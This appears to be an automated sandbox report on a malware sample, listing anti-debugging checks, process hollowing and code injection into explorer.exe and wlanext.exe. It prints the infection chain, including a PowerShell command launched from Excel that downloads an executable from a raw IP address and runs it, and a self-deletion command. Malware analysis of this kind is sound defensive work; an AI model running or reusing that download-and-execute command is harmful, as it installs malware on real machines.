Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4AA16 mov eax, dword ptr fs:[00000030h] 9_2_00B4AA16
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C18A62 mov eax, dword ptr fs:[00000030h] 9_2_00C18A62
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B45210 mov eax, dword ptr fs:[00000030h] 9_2_00B45210
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B45210 mov ecx, dword ptr fs:[00000030h] 9_2_00B45210
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B45210 mov eax, dword ptr fs:[00000030h] 9_2_00B45210
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B45210 mov eax, dword ptr fs:[00000030h] 9_2_00B45210
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B63A1C mov eax, dword ptr fs:[00000030h] 9_2_00B63A1C
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B58A0A mov eax, dword ptr fs:[00000030h] 9_2_00B58A0A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B8927A mov eax, dword ptr fs:[00000030h] 9_2_00B8927A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0AA16 mov eax, dword ptr fs:[00000030h] 9_2_00C0AA16
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0AA16 mov eax, dword ptr fs:[00000030h] 9_2_00C0AA16
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BFB260 mov eax, dword ptr fs:[00000030h] 9_2_00BFB260
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BFB260 mov eax, dword ptr fs:[00000030h] 9_2_00BFB260
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BD4257 mov eax, dword ptr fs:[00000030h] 9_2_00BD4257
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B49240 mov eax, dword ptr fs:[00000030h] 9_2_00B49240
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B49240 mov eax, dword ptr fs:[00000030h] 9_2_00B49240
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B49240 mov eax, dword ptr fs:[00000030h] 9_2_00B49240
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B49240 mov eax, dword ptr fs:[00000030h] 9_2_00B49240
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B74BAD mov eax, dword ptr fs:[00000030h] 9_2_00B74BAD
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B74BAD mov eax, dword ptr fs:[00000030h] 9_2_00B74BAD
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B74BAD mov eax, dword ptr fs:[00000030h] 9_2_00B74BAD
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B72397 mov eax, dword ptr fs:[00000030h] 9_2_00B72397
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7B390 mov eax, dword ptr fs:[00000030h] 9_2_00B7B390
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B51B8F mov eax, dword ptr fs:[00000030h] 9_2_00B51B8F
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B51B8F mov eax, dword ptr fs:[00000030h] 9_2_00B51B8F
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BFD380 mov ecx, dword ptr fs:[00000030h] 9_2_00BFD380
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0138A mov eax, dword ptr fs:[00000030h] 9_2_00C0138A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h] 9_2_00B703E2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h] 9_2_00B703E2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h] 9_2_00B703E2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h] 9_2_00B703E2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h] 9_2_00B703E2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B703E2 mov eax, dword ptr fs:[00000030h] 9_2_00B703E2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6DBE9 mov eax, dword ptr fs:[00000030h] 9_2_00B6DBE9
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C15BA5 mov eax, dword ptr fs:[00000030h] 9_2_00C15BA5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC53CA mov eax, dword ptr fs:[00000030h] 9_2_00BC53CA
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC53CA mov eax, dword ptr fs:[00000030h] 9_2_00BC53CA
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C18B58 mov eax, dword ptr fs:[00000030h] 9_2_00C18B58
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B73B7A mov eax, dword ptr fs:[00000030h] 9_2_00B73B7A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B73B7A mov eax, dword ptr fs:[00000030h] 9_2_00B73B7A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4DB60 mov ecx, dword ptr fs:[00000030h] 9_2_00B4DB60
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0131B mov eax, dword ptr fs:[00000030h] 9_2_00C0131B
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4F358 mov eax, dword ptr fs:[00000030h] 9_2_00B4F358
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4DB40 mov eax, dword ptr fs:[00000030h] 9_2_00B4DB40
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C18CD6 mov eax, dword ptr fs:[00000030h] 9_2_00C18CD6
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5849B mov eax, dword ptr fs:[00000030h] 9_2_00B5849B
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C014FB mov eax, dword ptr fs:[00000030h] 9_2_00C014FB
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6CF0 mov eax, dword ptr fs:[00000030h] 9_2_00BC6CF0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6CF0 mov eax, dword ptr fs:[00000030h] 9_2_00BC6CF0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6CF0 mov eax, dword ptr fs:[00000030h] 9_2_00BC6CF0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7BC2C mov eax, dword ptr fs:[00000030h] 9_2_00B7BC2C
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6C0A mov eax, dword ptr fs:[00000030h] 9_2_00BC6C0A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6C0A mov eax, dword ptr fs:[00000030h] 9_2_00BC6C0A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6C0A mov eax, dword ptr fs:[00000030h] 9_2_00BC6C0A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6C0A mov eax, dword ptr fs:[00000030h] 9_2_00BC6C0A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C1740D mov eax, dword ptr fs:[00000030h] 9_2_00C1740D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C1740D mov eax, dword ptr fs:[00000030h] 9_2_00C1740D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C1740D mov eax, dword ptr fs:[00000030h] 9_2_00C1740D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6746D mov eax, dword ptr fs:[00000030h] 9_2_00B6746D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDC450 mov eax, dword ptr fs:[00000030h] 9_2_00BDC450
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDC450 mov eax, dword ptr fs:[00000030h] 9_2_00BDC450
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7A44B mov eax, dword ptr fs:[00000030h] 9_2_00B7A44B
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B71DB5 mov eax, dword ptr fs:[00000030h] 9_2_00B71DB5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B71DB5 mov eax, dword ptr fs:[00000030h] 9_2_00B71DB5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B71DB5 mov eax, dword ptr fs:[00000030h] 9_2_00B71DB5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B735A1 mov eax, dword ptr fs:[00000030h] 9_2_00B735A1
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0FDE2 mov eax, dword ptr fs:[00000030h] 9_2_00C0FDE2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0FDE2 mov eax, dword ptr fs:[00000030h] 9_2_00C0FDE2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0FDE2 mov eax, dword ptr fs:[00000030h] 9_2_00C0FDE2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0FDE2 mov eax, dword ptr fs:[00000030h] 9_2_00C0FDE2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7FD9B mov eax, dword ptr fs:[00000030h] 9_2_00B7FD9B
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7FD9B mov eax, dword ptr fs:[00000030h] 9_2_00B7FD9B
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B72581 mov eax, dword ptr fs:[00000030h] 9_2_00B72581
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B72581 mov eax, dword ptr fs:[00000030h] 9_2_00B72581
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B72581 mov eax, dword ptr fs:[00000030h] 9_2_00B72581
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B72581 mov eax, dword ptr fs:[00000030h] 9_2_00B72581
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h] 9_2_00B42D8A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h] 9_2_00B42D8A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h] 9_2_00B42D8A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h] 9_2_00B42D8A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h] 9_2_00B42D8A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BF8DF1 mov eax, dword ptr fs:[00000030h] 9_2_00BF8DF1
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5D5E0 mov eax, dword ptr fs:[00000030h] 9_2_00B5D5E0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5D5E0 mov eax, dword ptr fs:[00000030h] 9_2_00B5D5E0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C105AC mov eax, dword ptr fs:[00000030h] 9_2_00C105AC
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C105AC mov eax, dword ptr fs:[00000030h] 9_2_00C105AC
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h] 9_2_00BC6DC9
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h] 9_2_00BC6DC9
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h] 9_2_00BC6DC9
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6DC9 mov ecx, dword ptr fs:[00000030h] 9_2_00BC6DC9
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h] 9_2_00BC6DC9
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h] 9_2_00BC6DC9
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4AD30 mov eax, dword ptr fs:[00000030h] 9_2_00B4AD30
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BCA537 mov eax, dword ptr fs:[00000030h] 9_2_00BCA537
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B74D3B mov eax, dword ptr fs:[00000030h] 9_2_00B74D3B
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B74D3B mov eax, dword ptr fs:[00000030h] 9_2_00B74D3B
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B74D3B mov eax, dword ptr fs:[00000030h] 9_2_00B74D3B
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6C577 mov eax, dword ptr fs:[00000030h] 9_2_00B6C577
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6C577 mov eax, dword ptr fs:[00000030h] 9_2_00B6C577
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B67D50 mov eax, dword ptr fs:[00000030h] 9_2_00B67D50
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C18D34 mov eax, dword ptr fs:[00000030h] 9_2_00C18D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0E539 mov eax, dword ptr fs:[00000030h] 9_2_00C0E539
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B83D43 mov eax, dword ptr fs:[00000030h] 9_2_00B83D43
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC3540 mov eax, dword ptr fs:[00000030h] 9_2_00BC3540
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BF3D40 mov eax, dword ptr fs:[00000030h] 9_2_00BF3D40
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C18ED6 mov eax, dword ptr fs:[00000030h] 9_2_00C18ED6
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC46A7 mov eax, dword ptr fs:[00000030h] 9_2_00BC46A7
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDFE87 mov eax, dword ptr fs:[00000030h] 9_2_00BDFE87
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B716E0 mov ecx, dword ptr fs:[00000030h] 9_2_00B716E0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B576E2 mov eax, dword ptr fs:[00000030h] 9_2_00B576E2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C10EA5 mov eax, dword ptr fs:[00000030h] 9_2_00C10EA5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C10EA5 mov eax, dword ptr fs:[00000030h] 9_2_00C10EA5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C10EA5 mov eax, dword ptr fs:[00000030h] 9_2_00C10EA5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B736CC mov eax, dword ptr fs:[00000030h] 9_2_00B736CC
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BFFEC0 mov eax, dword ptr fs:[00000030h] 9_2_00BFFEC0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B88EC7 mov eax, dword ptr fs:[00000030h] 9_2_00B88EC7
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BFFE3F mov eax, dword ptr fs:[00000030h] 9_2_00BFFE3F
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0AE44 mov eax, dword ptr fs:[00000030h] 9_2_00C0AE44
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0AE44 mov eax, dword ptr fs:[00000030h] 9_2_00C0AE44
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4E620 mov eax, dword ptr fs:[00000030h] 9_2_00B4E620
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7A61C mov eax, dword ptr fs:[00000030h] 9_2_00B7A61C
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7A61C mov eax, dword ptr fs:[00000030h] 9_2_00B7A61C
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4C600 mov eax, dword ptr fs:[00000030h] 9_2_00B4C600
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4C600 mov eax, dword ptr fs:[00000030h] 9_2_00B4C600
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4C600 mov eax, dword ptr fs:[00000030h] 9_2_00B4C600
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B78E00 mov eax, dword ptr fs:[00000030h] 9_2_00B78E00
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h] 9_2_00B6AE73
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h] 9_2_00B6AE73
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h] 9_2_00B6AE73
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h] 9_2_00B6AE73
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h] 9_2_00B6AE73
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01608 mov eax, dword ptr fs:[00000030h] 9_2_00C01608
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5766D mov eax, dword ptr fs:[00000030h] 9_2_00B5766D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h] 9_2_00B57E41
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h] 9_2_00B57E41
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h] 9_2_00B57E41
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h] 9_2_00B57E41
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h] 9_2_00B57E41
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h] 9_2_00B57E41
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B58794 mov eax, dword ptr fs:[00000030h] 9_2_00B58794
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC7794 mov eax, dword ptr fs:[00000030h] 9_2_00BC7794
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC7794 mov eax, dword ptr fs:[00000030h] 9_2_00BC7794
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC7794 mov eax, dword ptr fs:[00000030h] 9_2_00BC7794
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B837F5 mov eax, dword ptr fs:[00000030h] 9_2_00B837F5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7E730 mov eax, dword ptr fs:[00000030h] 9_2_00B7E730
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B44F2E mov eax, dword ptr fs:[00000030h] 9_2_00B44F2E
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B44F2E mov eax, dword ptr fs:[00000030h] 9_2_00B44F2E
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6F716 mov eax, dword ptr fs:[00000030h] 9_2_00B6F716
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C18F6A mov eax, dword ptr fs:[00000030h] 9_2_00C18F6A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDFF10 mov eax, dword ptr fs:[00000030h] 9_2_00BDFF10
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDFF10 mov eax, dword ptr fs:[00000030h] 9_2_00BDFF10
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7A70E mov eax, dword ptr fs:[00000030h] 9_2_00B7A70E
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7A70E mov eax, dword ptr fs:[00000030h] 9_2_00B7A70E
Checks if the current process is being debugged
Source: C:\Users\Public\eVJOpc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\wlanext.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00409B50 LdrLoadDll, 9_2_00409B50

HIPS / PFW / Operating System Protection Evasion:

Sample uses process hollowing technique
Source: C:\Users\Public\eVJOpc.exe Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: DA0000
Maps a DLL or memory area into another process
Source: C:\Users\Public\eVJOpc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\eVJOpc.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\Public\eVJOpc.exe Memory written: C:\Users\Public\eVJOpc.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\Public\eVJOpc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\eVJOpc.exe Thread register set: target process: 3352
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
Yara detected Xls With Macro 4.0
Source: Yara match File source: app.xml, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\explorer.exe 'C:\Windows\system32\explorer.exe' C:\Users\Public\eVJOpc.exe
Source: C:\Users\Public\eVJOpc.exe Process created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe'
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\eVJOpc.exe'
Source: explorer.exe, 00000007.00000002.561411411.0000000000FA0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.375021132.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000000A.00000002.559932711.0000000000B68000.00000004.00000020.sdmp Binary or memory string: Progman\Pr
Source: explorer.exe, 00000007.00000002.561411411.0000000000FA0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.375021132.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.561411411.0000000000FA0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.375021132.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.561411411.0000000000FA0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.375021132.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.402916350.0000000008778000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
